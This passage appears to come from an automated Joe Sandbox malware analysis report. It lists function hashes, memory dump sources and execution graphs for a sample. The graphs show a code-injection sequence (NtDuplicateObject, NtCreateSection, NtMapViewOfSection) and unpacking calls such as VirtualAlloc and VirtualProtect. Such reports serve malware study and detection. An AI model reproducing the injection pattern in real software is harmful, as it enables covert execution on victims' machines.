                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f19d6598d7b3f8bbc47500c90c3d0bc6a0ede41a7b6f28d3ccddc132527cc834
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 49220a4dcaca44086484813bdb512237367292e15b320859d1a96440f4f24ef4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f19d6598d7b3f8bbc47500c90c3d0bc6a0ede41a7b6f28d3ccddc132527cc834
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7801A7B1208244FBDB016BD19D62EB93768AB05354F204537FA53790F2C67D8912E72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                  Function 0055092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135693322.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_550000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a0d7601ad3be0be9ca7345b1b9b156f71840a4e34a964fc1e8f9d03f8084ce82
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 483179B6900609CFDB10CF99C880AAEBBF9FF48325F24504AD841A7351D771EA49CBA4
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 005DF22D Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2136667464.00000000005D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 005D8000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5d8000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 862b97f804dc900b862328dd0e529abca940ec3582f87d39a1fcde5c7c3de1ae
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2911707A3401009FD754DF59DC81FA677EAFB88320B298066ED09CB315E675EC02C760
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00550D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135693322.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_550000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 714e70d2f4900003e1559038d9d578e80d48b8cbfd1985c0913e936ce88b802b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E801DF72A006008FDB21DF60C825BAA37B9FB86306F1544A6D90A97282E370A8498B80
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004023E5 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d35cd02017a8908298582cacd0956aff43537afd2df8e264233619bb44fb754d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82C08C72D960008AE65BC6908A87644BB33F003830B341F2DC5018F126D272C2178220
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004026A0 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 43de6de374997940977aed32f8962cbc5b01e7d76103009d4fd772cc687ca080
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b8708e0fd601c17419c4bee628408aeaf70cc106fe2e9d70b960fe5b7e9fb35e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43de6de374997940977aed32f8962cbc5b01e7d76103009d4fd772cc687ca080
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DC02B7308020940C754CE701A0010CF2D09555208F31FD234005FF182D260F1C755C2
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                                                  Execution Coverage:5.9%
                                                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:35.8%
                                                                                                                                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:81
                                                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:2
                                                                                                                                                                                                                                                                                                                                                                  execution_graph 4465 401561 4466 401570 4465->4466 4467 401608 NtDuplicateObject 4466->4467 4473 4018dd 4466->4473 4468 401625 NtCreateSection 4467->4468 4467->4473 4469 4016a5 NtCreateSection 4468->4469 4470 40164b NtMapViewOfSection 4468->4470 4472 4016d1 4469->4472 4469->4473 4470->4469 4471 40166e NtMapViewOfSection 4470->4471 4471->4469 4474 40168c 4471->4474 4472->4473 4475 4016db NtMapViewOfSection 4472->4475 4474->4469 4475->4473 4476 401702 NtMapViewOfSection 4475->4476 4476->4473 4477 401724 4476->4477 4477->4473 4478 401729 3 API calls 4477->4478 4478->4473 4437 402e07 4439 402e1a 4437->4439 4438 40193e 11 API calls 4440 402f54 4438->4440 4439->4438 4439->4440 4525 4c092b GetPEB 4526 4c0972 4525->4526 4453 40194a 4454 40194f 4453->4454 4455 401991 Sleep 4454->4455 4456 4019ac 4455->4456 4457 401553 10 API calls 4456->4457 4458 4019bd 4456->4458 4457->4458 4419 5ee972 4422 5ee978 4419->4422 4423 5ee987 4422->4423 4426 5ef118 4423->4426 4428 5ef133 4426->4428 4427 5ef13c CreateToolhelp32Snapshot 4427->4428 4429 5ef158 Module32First 4427->4429 4428->4427 4428->4429 4430 5ee977 4429->4430 4431 5ef167 4429->4431 4433 5eedd7 4431->4433 4434 5eee02 4433->4434 4435 5eee4b 4434->4435 4436 5eee13 VirtualAlloc 4434->4436 4435->4435 4436->4435 4369 4c003c 4370 4c0049 4369->4370 4382 4c0e0f SetErrorMode SetErrorMode 4370->4382 4375 4c0265 4376 4c02ce VirtualProtect 4375->4376 4378 4c030b 4376->4378 4377 4c0439 VirtualFree 4381 4c04be LoadLibraryA 4377->4381 4378->4377 4380 4c08c7 4381->4380 4383 4c0223 4382->4383 4384 4c0d90 4383->4384 4385 4c0dad 4384->4385 4386 4c0dbb GetPEB 4385->4386 4387 4c0238 VirtualAlloc 4385->4387 4386->4387 4387->4375 4388 402eba 4389 402ecc 4388->4389 4391 402f54 4389->4391 4392 40193e 4389->4392 4393 40194f 4392->4393 4394 401991 Sleep 4393->4394 4395 4019ac 4394->4395 4397 4019bd 4395->4397 4398 401553 4395->4398 4397->4391 4399 401563 4398->4399 4400 4018dd 4399->4400 4401 401608 NtDuplicateObject 4399->4401 4400->4397 4401->4400 4402 401625 NtCreateSection 4401->4402 4403 4016a5 NtCreateSection 4402->4403 4404 40164b NtMapViewOfSection 4402->4404 4403->4400 4406 4016d1 4403->4406 4404->4403 4405 40166e NtMapViewOfSection 4404->4405 4405->4403 4407 40168c 4405->4407 4406->4400 4408 4016db NtMapViewOfSection 4406->4408 4407->4403 4408->4400 4409 401702 NtMapViewOfSection 4408->4409 4409->4400 4410 401724 4409->4410 4410->4400 4412 401729 4410->4412 4413 40172b 4412->4413 4418 401724 4412->4418 4414 4016be NtCreateSection 4413->4414 4413->4418 4415 4016d1 4414->4415 4414->4418 4416 4016db NtMapViewOfSection 4415->4416 4415->4418 4417 401702 NtMapViewOfSection 4416->4417 4416->4418 4417->4418 4418->4400

                                                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                                                  Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 208nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 85 401553-4015b2 call 4011cd 97 4015b4 85->97 98 4015b7-4015bc 85->98 97->98 100 4015c2-4015d3 98->100 101 4018df-4018e7 98->101 105 4015d9-401602 100->105 106 4018dd 100->106 101->98 104 4018ec-40193b call 4011cd 101->104 105->106 113 401608-40161f NtDuplicateObject 105->113 106->104 113->106 115 401625-401649 NtCreateSection 113->115 117 4016a5-4016cb NtCreateSection 115->117 118 40164b-40166c NtMapViewOfSection 115->118 117->106 122 4016d1-4016d5 117->122 118->117 121 40166e-40168a NtMapViewOfSection 118->121 121->117 124 40168c-4016a2 121->124 122->106 125 4016db-4016fc NtMapViewOfSection 122->125 124->117 125->106 127 401702-40171e NtMapViewOfSection 125->127 127->106 130 401724 127->130 130->106 131 401724 call 401729 130->131 131->106
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ffaca3094f7e189a6d1e876f152d3a102a579446f97b5118db7f8e4db1241ca1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB613075A00204FBEB209F91CC49FAF7BB8EF85700F10412AF912BA1E5D7759941DB66
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040156B Relevance: 10.7, APIs: 7, Instructions: 176nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 132 40156b-4015b2 call 4011cd 144 4015b4 132->144 145 4015b7-4015bc 132->145 144->145 147 4015c2-4015d3 145->147 148 4018df-4018e7 145->148 152 4015d9-401602 147->152 153 4018dd 147->153 148->145 151 4018ec-40193b call 4011cd 148->151 152->153 160 401608-40161f NtDuplicateObject 152->160 153->151 160->153 162 401625-401649 NtCreateSection 160->162 164 4016a5-4016cb NtCreateSection 162->164 165 40164b-40166c NtMapViewOfSection 162->165 164->153 169 4016d1-4016d5 164->169 165->164 168 40166e-40168a NtMapViewOfSection 165->168 168->164 171 40168c-4016a2 168->171 169->153 172 4016db-4016fc NtMapViewOfSection 169->172 171->164 172->153 174 401702-40171e NtMapViewOfSection 172->174 174->153 177 401724 174->177 177->153 178 401724 call 401729 177->178 178->153
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c2bbe74deda3eb27cc46c97da06047b5daec93b008bb2466c6e516ff61897217
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bfc0b8c1e1aad88884ae744cc722ee3a04b4b25e2f03b0569bf5ee1b63965b96
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2bbe74deda3eb27cc46c97da06047b5daec93b008bb2466c6e516ff61897217
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34512B75900205BBEB209F91CC49FAF7BB8FF85B00F14412AF912BA2E5D7759941CB25
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401561 Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 179 401561-4015b2 call 4011cd 189 4015b4 179->189 190 4015b7-4015bc 179->190 189->190 192 4015c2-4015d3 190->192 193 4018df-4018e7 190->193 197 4015d9-401602 192->197 198 4018dd 192->198 193->190 196 4018ec-40193b call 4011cd 193->196 197->198 205 401608-40161f NtDuplicateObject 197->205 198->196 205->198 207 401625-401649 NtCreateSection 205->207 209 4016a5-4016cb NtCreateSection 207->209 210 40164b-40166c NtMapViewOfSection 207->210 209->198 214 4016d1-4016d5 209->214 210->209 213 40166e-40168a NtMapViewOfSection 210->213 213->209 216 40168c-4016a2 213->216 214->198 217 4016db-4016fc NtMapViewOfSection 214->217 216->209 217->198 219 401702-40171e NtMapViewOfSection 217->219 219->198 222 401724 219->222 222->198 223 401724 call 401729 222->223 223->198
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f5d4f3e6d24d18269c7d341504c2ba3eacb72c3278c0acdc5b4cfb2713eaeaae
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 412e9309e7daddaa9b19f32dddfbffbd79934f2f1d3bc440b9a7152e2b53a84f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5d4f3e6d24d18269c7d341504c2ba3eacb72c3278c0acdc5b4cfb2713eaeaae
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 235119B1900205BFEB209F91CC49FAF7BB8EF85B00F14412AF912BA2E5D7759941CB25
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040156F Relevance: 10.7, APIs: 7, Instructions: 172nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 224 40156f-4015b2 call 4011cd 232 4015b4 224->232 233 4015b7-4015bc 224->233 232->233 235 4015c2-4015d3 233->235 236 4018df-4018e7 233->236 240 4015d9-401602 235->240 241 4018dd 235->241 236->233 239 4018ec-40193b call 4011cd 236->239 240->241 248 401608-40161f NtDuplicateObject 240->248 241->239 248->241 250 401625-401649 NtCreateSection 248->250 252 4016a5-4016cb NtCreateSection 250->252 253 40164b-40166c NtMapViewOfSection 250->253 252->241 257 4016d1-4016d5 252->257 253->252 256 40166e-40168a NtMapViewOfSection 253->256 256->252 259 40168c-4016a2 256->259 257->241 260 4016db-4016fc NtMapViewOfSection 257->260 259->252 260->241 262 401702-40171e NtMapViewOfSection 260->262 262->241 265 401724 262->265 265->241 266 401724 call 401729 265->266 266->241
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8d7d0f05522378b87eb0e5b73b0488eef97448bc713828db65d76f104e18ff93
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5723072b253cbae10e330d7def6e8ce5ab34414c0c11206194204dab9df800f9
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d7d0f05522378b87eb0e5b73b0488eef97448bc713828db65d76f104e18ff93
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A5109B1900205BBEB209F91CC49FAF7BB8EF85B00F144129FA11BA2E5D6759945CB24
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401583 Relevance: 10.7, APIs: 7, Instructions: 171nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 267 401583-4015b2 call 4011cd 276 4015b4 267->276 277 4015b7-4015bc 267->277 276->277 279 4015c2-4015d3 277->279 280 4018df-4018e7 277->280 284 4015d9-401602 279->284 285 4018dd 279->285 280->277 283 4018ec-40193b call 4011cd 280->283 284->285 292 401608-40161f NtDuplicateObject 284->292 285->283 292->285 294 401625-401649 NtCreateSection 292->294 296 4016a5-4016cb NtCreateSection 294->296 297 40164b-40166c NtMapViewOfSection 294->297 296->285 301 4016d1-4016d5 296->301 297->296 300 40166e-40168a NtMapViewOfSection 297->300 300->296 303 40168c-4016a2 300->303 301->285 304 4016db-4016fc NtMapViewOfSection 301->304 303->296 304->285 306 401702-40171e NtMapViewOfSection 304->306 306->285 309 401724 306->309 309->285 310 401724 call 401729 309->310 310->285
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
